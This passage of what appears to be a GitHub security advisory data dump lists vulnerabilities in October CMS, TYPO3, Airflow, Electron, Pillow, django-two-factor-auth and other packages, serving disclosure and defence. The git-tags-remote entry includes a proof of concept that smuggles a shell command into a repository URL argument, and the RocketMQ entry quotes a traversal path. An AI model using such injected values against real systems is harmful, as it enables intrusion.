+Thanks to [Michał Bentkowski of Securitum](https://research.securitum.com/authors/michal-bentkowski/) for finding the original issue in Froala and @tomaszstrojny for reporting the issue to the October CMS team.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'october/backend'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.319'}, {'fixed': '1.0.467'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/octobercms/october/security/advisories/GHSA-3pc2-fm7p-q2vg'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-4061'}, {'type': 'WEB', 'url': 'https://github.com/octobercms/october/commit/b384954a29b89117e1c0d6035b3ede4f46df67c5'}, {'type': 'WEB', 'url': 'https://research.securitum.com/the-curious-case-of-copy-paste/'}]","{'cwe_ids': ['CWE-79'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2020-07-02T16:54:50Z', 'nvd_published_at': None}"
+1.4.0,GHSA-3x94-fv5h-5q2c,2021-10-08T20:36:13Z,2020-07-29T16:15:32Z,,['CVE-2020-15099'],Exposure of Sensitive Information to an Unauthorized Actor in TYPO3 CMS,"> ### Meta
+> * CVSS: `CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F/RL:O/RC:C` (7.5)
+> * CWE-20, CWE-200
+
+### Problem
+In case an attacker manages to generate a valid cryptographic message authentication code (HMAC-SHA1) - either by using a different existing vulnerability or in case the internal _encryptionKey_ was exposed - it is possible to retrieve arbitrary files of a TYPO3 installation. This includes the possibility to fetch _typo3conf/LocalConfiguration.php_ which again contains the _encryptionKey_ as well as credentials of the database management system being used.
+
+In case a database server is directly accessible either via internet or in a shared hosting network, this allows to completely retrieve, manipulate or delete database contents. This includes creating an administration user account - which can be used to trigger remote code execution by injecting custom extensions.
+
+### Solution
+Update to TYPO3 versions 9.5.20 or 10.4.6 that fix the problem described.
+
+### Credits
+Thanks to TYPO3 security team member Oliver Hader who reported and fixed the issue.
+
+### References
+* [TYPO3-CORE-SA-2020-007](https://typo3.org/security/advisory/typo3-core-sa-2020-007)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.0.0'}, {'fixed': '9.5.20'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '10.0.0'}, {'fixed': '10.4.6'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/TYPO3/TYPO3.CMS/security/advisories/GHSA-3x94-fv5h-5q2c'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15099'}, {'type': 'PACKAGE', 'url': 'https://github.com/TYPO3/TYPO3.CMS'}, {'type': 'WEB', 'url': 'https://typo3.org/security/advisory/typo3-core-sa-2020-007'}]","{'cwe_ids': ['CWE-20', 'CWE-200'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-07-29T16:14:57Z', 'nvd_published_at': '2020-07-29T17:15:00Z'}"
+1.4.0,GHSA-rvmq-4x66-q7j3,2023-09-01T10:09:33Z,2020-07-27T16:57:33Z,,['CVE-2020-11978'],Remote code execution in Apache Airflow,An issue was found in Apache Airflow versions 1.10.10 and below. A remote code/command injection vulnerability was discovered in one of the example DAGs shipped with Airflow which would allow any authenticated user to run arbitrary commands as the user running airflow worker/scheduler (depending on the executor in use). If you already have examples disabled by setting load_examples=False in the config then you are not vulnerable.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'apache-airflow'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.10.11'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-11978'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/airflow'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r7255cf0be3566f23a768e2a04b40fb09e52fcd1872695428ba9afe91%40%3Cusers.airflow.apache.org%3E'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/162908/Apache-Airflow-1.10.10-Remote-Code-Execution.html'}]","{'cwe_ids': ['CWE-77', 'CWE-78'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-07-27T16:54:51Z', 'nvd_published_at': '2020-07-17T00:15:00Z'}"
+1.4.0,GHSA-f97h-2pfx-f59f,2023-02-01T09:16:37Z,2020-07-29T18:07:20Z,,['CVE-2020-7695'],HTTP response splitting in uvicorn,"Uvicorn before 0.11.7 is vulnerable to HTTP response splitting. CRLF sequences are not escaped in the value of HTTP headers. Attackers can exploit exploit this to add arbitrary headers to HTTP responses, or even return an arbitrary response body, whenever crafted input is used to construct HTTP headers.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'uvicorn'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.11.7'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7695'}, {'type': 'PACKAGE', 'url': 'https://github.com/encode/uvicorn'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-PYTHON-UVICORN-570471'}]","{'cwe_ids': ['CWE-74'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-07-29T17:37:41Z', 'nvd_published_at': '2020-07-27T12:15:00Z'}"
+1.4.0,GHSA-5jpf-pj32-xx53,2021-01-07T23:44:25Z,2020-07-29T16:26:22Z,,['CVE-2020-15125'],Authorization header is not sanitized in an error object in auth0,"### Overview
+Versions before and including `2.27.0` use a block list of specific keys that should be sanitized from the request object contained in the error object. When a request to Auth0 management API fails, the key for `Authorization` header is not sanitized and the `Authorization` header value can be logged exposing a bearer token.
+
+### Am I affected?
+You are affected by this vulnerability if all of the following conditions apply:
+
+- You are using `auth0` npm package
+- You are using a Machine to Machine application authorized to use Auth0's management API https://auth0.com/docs/flows/concepts/client-credentials
+
+### How to fix that?
+Upgrade to version `2.27.1`
+
+### Will this update impact my users?
+The fix provided in patch will not affect your users.
+
+### Credit
+http://github.com/osdiab","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'auth0'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.27.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/auth0/node-auth0/security/advisories/GHSA-5jpf-pj32-xx53'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15125'}, {'type': 'WEB', 'url': 'https://github.com/auth0/node-auth0/pull/507'}, {'type': 'WEB', 'url': 'https://github.com/auth0/node-auth0/pull/507/commits/62ca61b3348ec8e74d7d00358661af1a8bc98a3c'}, {'type': 'WEB', 'url': 'https://github.com/auth0/node-auth0/tree/v2.27.1'}]","{'cwe_ids': ['CWE-209'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-07-29T16:25:59Z', 'nvd_published_at': None}"
+1.4.0,GHSA-236h-rqv8-8q73,2021-01-07T23:46:50Z,2020-07-22T23:06:47Z,,['CVE-2020-15126'],GraphQL: Security breach on Viewer query,"### Impact
+An authenticated user using the viewer GraphQL query can bypass all read security on his User object and can also bypass all objects linked via relation or Pointer on his User object.
+
+### Patches
+This vulnerability has been patched in Parse Server 4.3.0.
+
+### Workarounds
+No
+
+### References
+See [commit 78239ac](https://github.com/parse-community/parse-server/commit/78239ac9071167fdf243c55ae4bc9a2c0b0d89aa) for details.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'parse-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.5.0'}, {'fixed': '4.3.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/parse-community/parse-server/security/advisories/GHSA-236h-rqv8-8q73'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15126'}, {'type': 'WEB', 'url': 'https://github.com/parse-community/parse-server/commit/78239ac9071167fdf243c55ae4bc9a2c0b0d89aa'}, {'type': 'WEB', 'url': 'https://github.com/parse-community/parse-server/blob/master/CHANGELOG.md#430'}]","{'cwe_ids': ['CWE-863'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-07-22T23:06:30Z', 'nvd_published_at': None}"
+1.4.0,GHSA-vr98-27qj-3c8q,2023-09-05T23:31:52Z,2020-07-29T18:07:35Z,,['CVE-2020-7686'],Directory traversal in rollup-plugin-server,This affects all versions of package rollup-plugin-dev-server. There is no path sanitization in `readFile` operation inside the `readFileFromContentBase` function.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'rollup-plugin-server'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.7.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7686'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-ROLLUPPLUGINDEVSERVER-590124'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-07-29T17:46:03Z', 'nvd_published_at': None}"
+1.4.0,GHSA-5x3v-2gxr-59m2,2021-04-07T19:55:55Z,2020-07-01T17:26:15Z,,['CVE-2019-17572'],Directory traversal in Apache RocketMQ,"In Apache RocketMQ 4.2.0 to 4.6.0, when the automatic topic creation in the broker is turned on by default, an evil topic like “../../../../topic2020” is sent from rocketmq-client to the broker, a topic folder will be created in the parent directory in brokers, which leads to a directory traversal vulnerability. Users of the affected versions should apply one of the following: Upgrade to Apache RocketMQ 4.6.1 or later.",[],"[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.rocketmq:rocketmq-broker'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.2.0'}, {'fixed': '4.6.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-17572'}, {'type': 'WEB', 'url': 'https://github.com/apache/rocketmq/issues/1637'}, {'type': 'WEB', 'url': 'https://github.com/apache/rocketmq/commit/f8f6fbe4aa7f5dee937e688322628c366b12a552'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/fdea1c5407da47a17d5522fa149a097cacded1916c1c1534d46edc6d%40%3Cprivate.rocketmq.apache.org%3E'}, {'type': 'WEB', 'url': 'https://seclists.org/oss-sec/2020/q2/112'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGAPACHEROCKETMQ-569108'}]","{'cwe_ids': ['CWE-22'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-07-01T17:26:05Z', 'nvd_published_at': None}"
+1.4.0,GHSA-gm9x-q798-hmr4,2021-09-23T17:26:33Z,2020-07-29T14:53:40Z,,[],Command Injection in git-tags-remote,"All versions of `git-tags-remote ` are vulnerable to Command Injection. The package fails to sanitize the repository input and passes it directly to an `exec` call on the `get` function . This may allow attackers to execute arbitrary code in the system if the `repo` value passed to the function is user-controlled.
+
+The following proof-of-concept creates a file in `/tmp`:
+```
+const gitTagsRemote = require('git-tags-remote');
+
+gitTagsRemote.get('https://github.com/sh0ji/git-tags-remote.git; echo ""Injection Success"" > /tmp/command-injection.test')
+.then(tags => console.log(tags));
+```","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'git-tags-remote'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/sh0ji/git-tags-remote/issues/58'}, {'type': 'WEB', 'url': 'https://github.com/sh0ji/git-tags-remote/commit/a20488960cbd2c98455386108253094897ebfc1c'}, {'type': 'PACKAGE', 'url': 'https://github.com/sh0ji/git-tags-remote'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1517'}]","{'cwe_ids': ['CWE-78'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-07-29T14:52:24Z', 'nvd_published_at': None}"
+1.4.0,GHSA-h9jc-284h-533g,2021-01-07T23:48:28Z,2020-07-07T00:01:10Z,,['CVE-2020-4077'],Context isolation bypass via contextBridge in Electron,"### Impact
+Apps using both `contextIsolation` and `contextBridge` are affected.
+
+This is a context isolation bypass, meaning that code running in the main world context in the renderer can reach into the isolated Electron context and perform privileged actions.
+
+### Workarounds
+There are no app-side workarounds, you must update your Electron version to be protected.
+
+### Fixed Versions
+* `9.0.0-beta.21`
+* `8.2.4`
+* `7.2.4`
+
+### For more information
+If you have any questions or comments about this advisory:
+* Email us at [security@electronjs.org](mailto:security@electronjs.org)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'electron'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '7.2.4'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'electron'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.0.0'}, {'fixed': '8.2.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/electron/electron/security/advisories/GHSA-h9jc-284h-533g'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-4077'}, {'type': 'WEB', 'url': 'https://github.com/electron/electron/commit/b8e347709245d2dc5640fbb3044d9b21b4eaa6b0'}, {'type': 'WEB', 'url': 'https://www.electronjs.org/releases/stable?page=3#release-notes-for-v824'}]","{'cwe_ids': ['CWE-501'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-07-06T23:55:23Z', 'nvd_published_at': None}"
+1.4.0,GHSA-f9mq-jph6-9mhm,2021-01-07T23:48:36Z,2020-07-07T00:01:13Z,,['CVE-2020-4075'],Arbitrary file read via window-open IPC in Electron,"### Impact
+The vulnerability allows arbitrary local file read by defining unsafe window options on a child window opened via window.open.
+
+### Workarounds
+Ensure you are calling `event.preventDefault()` on all [`new-window`](https://electronjs.org/docs/api/web-contents#event-new-window) events where the `url` or `options` is not something you expect.
+
+### Fixed Versions
+* `9.0.0-beta.21`
+* `8.2.4`
+* `7.2.4`
+
+### For more information
+If you have any questions or comments about this advisory:
+* Email us at [security@electronjs.org](mailto:security@electronjs.org)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'electron'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '7.2.4'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'electron'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.0.0'}, {'fixed': '8.2.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/electron/electron/security/advisories/GHSA-f9mq-jph6-9mhm'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-4075'}, {'type': 'WEB', 'url': 'https://www.electronjs.org/releases/stable?page=3#release-notes-for-v824'}]","{'cwe_ids': ['CWE-552'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-07-06T23:54:56Z', 'nvd_published_at': None}"
+1.4.0,GHSA-vj42-xq3r-hr3r,2023-09-05T09:11:44Z,2020-07-27T21:52:39Z,,['CVE-2020-10994'],Out-of-bounds reads in Pillow,"In `libImaging/Jpeg2KDecode.c` in Pillow before 7.1.0, there are multiple out-of-bounds reads via a crafted JP2 file.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'Pillow'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '7.1.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-10994'}, {'type': 'WEB', 'url': 'https://github.com/python-pillow/Pillow/pull/4505'}, {'type': 'WEB', 'url': 'https://github.com/python-pillow/Pillow/pull/4538'}, {'type': 'WEB', 'url': 'https://github.com/python-pillow/Pillow/commit/ff60894d697d1992147b791101ad53a8bf1352e4'}, {'type': 'PACKAGE', 'url': 'https://github.com/python-pillow/Pillow'}, {'type': 'WEB', 'url': 'https://github.com/python-pillow/Pillow/blob/master/docs/releasenotes/7.1.0.rst#security'}, {'type': 'WEB', 'url': 'https://github.com/python-pillow/Pillow/commits/master/src/libImaging/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BEBCPE4F2VHTIT6EZA2YZQZLPVDEBJGD/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HOKHNWV2VS5GESY7IBD237E7C6T3I427/'}, {'type': 'WEB', 'url': 'https://pillow.readthedocs.io/en/stable/releasenotes/'}, {'type': 'WEB', 'url': 'https://pillow.readthedocs.io/en/stable/releasenotes/7.1.0.html'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-PYTHON-PILLOW-574575'}, {'type': 'WEB', 'url': 'https://usn.ubuntu.com/4430-1/'}, {'type': 'WEB', 'url': 'https://usn.ubuntu.com/4430-2/'}]","{'cwe_ids': ['CWE-125'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-07-27T21:51:26Z', 'nvd_published_at': '2020-06-25T19:15:00Z'}"
+1.4.0,GHSA-vh7m-p724-62c2,2021-09-23T17:39:58Z,2020-07-29T20:40:35Z,,['CVE-2020-13822'],Signature Malleabillity in elliptic,"The Elliptic package before version 6.5.3 for Node.js allows ECDSA signature malleability via variations in encoding, leading '\0' bytes, or integer overflows. This could conceivably have a security-relevant impact if an application relied on a single canonical signature.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'elliptic'}, 'ecosystem_specific': {'affected_functions': ['elliptic.ec']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.5.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-13822'}, {'type': 'WEB', 'url': 'https://github.com/indutny/elliptic/issues/226'}, {'type': 'WEB', 'url': 'https://github.com/indutny/elliptic/commit/856fe4d99fe7b6200556e6400b3bf585b1721bec'}, {'type': 'PACKAGE', 'url': 'https://github.com/indutny/elliptic'}, {'type': 'WEB', 'url': 'https://medium.com/@herman_10687/malleability-attack-why-it-matters-7b5f59fb99a4'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/elliptic'}, {'type': 'WEB', 'url': 'https://yondon.blog/2019/01/01/how-not-to-use-ecdsa/'}]","{'cwe_ids': ['CWE-190'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-07-29T20:39:31Z', 'nvd_published_at': None}"
+1.4.0,GHSA-f7f4-hqp2-7prc,2021-09-22T21:11:20Z,2020-07-24T20:10:21Z,,['CVE-2018-21036'],Improper Input Validation in sails-hook-sockets,Sails.js before v1.0.0-46 allows attackers to cause a denial of service with a single request because there is no error handler in sails-hook-sockets to handle an empty pathname in a WebSocket request.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'sails-hook-sockets'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.5.5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2018-21036'}, {'type': 'WEB', 'url': 'https://github.com/balderdashy/sails-hook-sockets/commit/0533a4864b1920fd8fbb5287bc0889193c5faf44'}, {'type': 'WEB', 'url': 'https://github.com/balderdashy/sails-hook-sockets/commit/ff02114eaec090ee51db48435cc32d451662606e'}, {'type': 'PACKAGE', 'url': 'https://github.com/balderdashy/sails-hook-sockets'}, {'type': 'WEB', 'url': 'https://github.com/balderdashy/sails/blob/56f8276f6501a144a03d1f0f28df4ccdb4ad82e2/CHANGELOG.md'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2020/07/19/1'}]","{'cwe_ids': ['CWE-20'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-07-24T17:27:33Z', 'nvd_published_at': '2020-07-21T14:15:00Z'}"
+1.4.0,GHSA-7phr-5m9x-rw9q,2021-09-22T21:15:28Z,2020-07-27T16:02:57Z,,['CVE-2020-7687'],Directory traversal in fast-http,This affects all versions of package fast-http. There is no path sanitization in the path provided at fs.readFile in index.js.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'fast-http'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.1.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7687'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-FASTHTTP-572892'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-07-27T16:00:48Z', 'nvd_published_at': None}"
+1.4.0,GHSA-cc2p-4jhr-xhhx,2021-01-07T23:43:05Z,2020-07-30T14:58:42Z,,['CVE-2020-15130'],False-positive validity for NFT1 genesis transactions in SLPJS,"### Impact
+In the npm package named ""slpjs"", versions prior to 0.27.4 are vulnerable to false-positive validation outcomes for the NFT1 Child Genesis transaction type. A poorly implemented SLP wallet or opportunistic attacker could create a seemingly valid NFT1 child token without burning any of the NFT1 Group token type as is required by the NFT1 specification.
+
+### Patches
+npm package ""slpjs"" has been patched and is published and tagged as version 0.27.4.
+
+### Workarounds
+Upgrade to slpjs 0.27.4.
+
+### References
+* Package location: https://www.npmjs.com/package/slpjs
+* SLP NFT1 spec: https://slp.dev/specs/slp-nft-1/#nft1-protocol-requirements
+* Git commit hash fixing this issue: https://github.com/simpleledger/slpjs/commit/290c20e8bff13ac81459d43e54cac232b5e3456c
+* Unit tests have been added to assist validator implementations in avoiding this bug: https://github.com/simpleledger/slp-unit-test-data/commit/8c942eacfae12686dcf1f3366321445a4fba73e7
+
+### For more information
+If you have any questions or comments about this advisory please open an issue in the [slp-validate](https://github.com/simpleledger/slpjs/issues) repository.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'slpjs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.27.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/simpleledger/slpjs/security/advisories/GHSA-cc2p-4jhr-xhhx'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15130'}, {'type': 'WEB', 'url': 'https://github.com/simpleledger/slpjs/commit/290c20e8bff13ac81459d43e54cac232b5e3456c'}]","{'cwe_ids': ['CWE-697'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-07-30T14:44:06Z', 'nvd_published_at': None}"
+1.4.0,GHSA-w7q9-p3jq-fmhm,2023-09-08T22:35:55Z,2020-07-27T15:46:57Z,,['CVE-2020-8175'],Uncontrolled resource consumption in jpeg-js,Uncontrolled resource consumption in `jpeg-js` before 0.4.0 may allow attacker to launch denial of service attacks using specially a crafted JPEG image.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'jpeg-js'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.4.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-8175'}, {'type': 'WEB', 'url': 'https://github.com/eugeneware/jpeg-js/commit/135705b1510afb6cb4275a4655d92c58f6843e79'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/842462'}]","{'cwe_ids': ['CWE-400'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-07-27T15:46:02Z', 'nvd_published_at': None}"
+1.4.0,GHSA-jmqm-f2gx-4fjv,2021-09-22T19:00:07Z,2020-07-07T18:59:10Z,,[],Sensitive information exposure through logs in npm-registry-fetch,Affected versions of `npm-registry-fetch` are vulnerable to an information exposure vulnerability through log files. The cli supports URLs like `://[[:]@][:][:][/]`. The password value is not redacted and is printed to stdout and also to any generated log files.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'npm-registry-fetch'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.0.5'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'npm-registry-fetch'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0.0'}, {'fixed': '8.1.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/npm/npm-registry-fetch/security/advisories/GHSA-jmqm-f2gx-4fjv'}, {'type': 'WEB', 'url': 'https://github.com/npm/npm-registry-fetch/pull/29'}, {'type': 'WEB', 'url': 'https://github.com/npm/npm-registry-fetch/commit/18bf9b97fb1deecdba01ffb05580370846255c88'}, {'type': 'PACKAGE', 'url': 'https://github.com/npm/npm-registry-fetch'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-NPMREGISTRYFETCH-575432'}]","{'cwe_ids': ['CWE-352'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-07-07T18:26:15Z', 'nvd_published_at': None}"
+1.4.0,GHSA-vhr6-pvjm-9qwf,2021-01-07T23:48:04Z,2020-07-10T20:55:00Z,,['CVE-2020-15105'],User passwords are stored in clear text in the Django session,"### Impact
+
+django-two-factor-auth versions 1.11 and before store the user's password in clear text in the user session (base64-encoded). The password is stored in the session when the user submits their username and password, and is removed once they complete authentication by entering a two-factor authentication code. This means that the password is stored in clear text in the session for an arbitrary amount of time, and potentially forever if the user begins the login process by entering their username and password, and then leaves before entering their two-factor authentication code.
+
+The severity of this issue depends on which type of session storage you have configured: in the worst case, if you're using Django's default database session storage, then users' password are stored in clear text in your database. In the best case, if you're using Django's signed cookie session, then users' passwords are only stored in clear text within their browser's cookie store. In the common case of using Django's cache session store, the users' password are stored in clear text in whatever cache storage you have configured (typically Memcached or Redis).
+
+### Patches
+
+Upgrade to version 1.12 to resolve this issue.
+
+After upgrading, users should be sure to delete any clear text passwords that have been stored. For example, if you're using the database session backend, you'll likely want to delete any session record from the database and purge that data from any database backups or replicas.
+
+In addition, affected organizations who have suffered a database breach while using an affected version should inform their users that their clear text passwords have been compromised. All organizations should encourage users whose passwords were insecurely stored to change these passwords on any sites where they were used.
+
+### Workarounds
+
+Switching Django's session storage to use signed cookies instead of the database or cache lessens the impact of this issue, but should not be done without a thorough understanding of the security tradeoffs of using signed cookies rather than a server-side session storage. There is no way to fully mitigate the issue without upgrading.
+
+### References
+
+For an explanation of why storing cleartext password is a substantial vulnerability: [Hashing Passwords: One-Way Road to Security](https://auth0.com/blog/hashing-passwords-one-way-road-to-security/).
+For documentation on configuring the Django session storage engine: [Django session documentation](https://docs.djangoproject.com/en/3.0/topics/http/sessions/).
+
+### For more information
+If you have any questions or comments about this advisory:
